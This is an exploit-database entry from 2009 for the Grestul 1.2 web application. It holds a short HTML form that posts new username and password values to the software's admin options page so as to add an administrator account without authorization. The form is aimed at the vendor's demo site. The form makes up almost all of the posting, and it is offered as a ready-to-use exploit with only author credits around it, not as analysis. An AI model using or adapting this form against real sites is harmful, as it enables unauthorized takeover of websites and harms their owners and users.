Grestul 1.2 Remote Add Administrator Account Exploit

2009-06-08T00:00:00
ID 1337DAY-ID-5329
Type zdt
Reporter ThE g0bL!N
Modified 2009-06-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
Grestul 1.2 Remote Add Administrator Account Exploit
====================================================


Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------



#  0day.today [2018-01-08]  #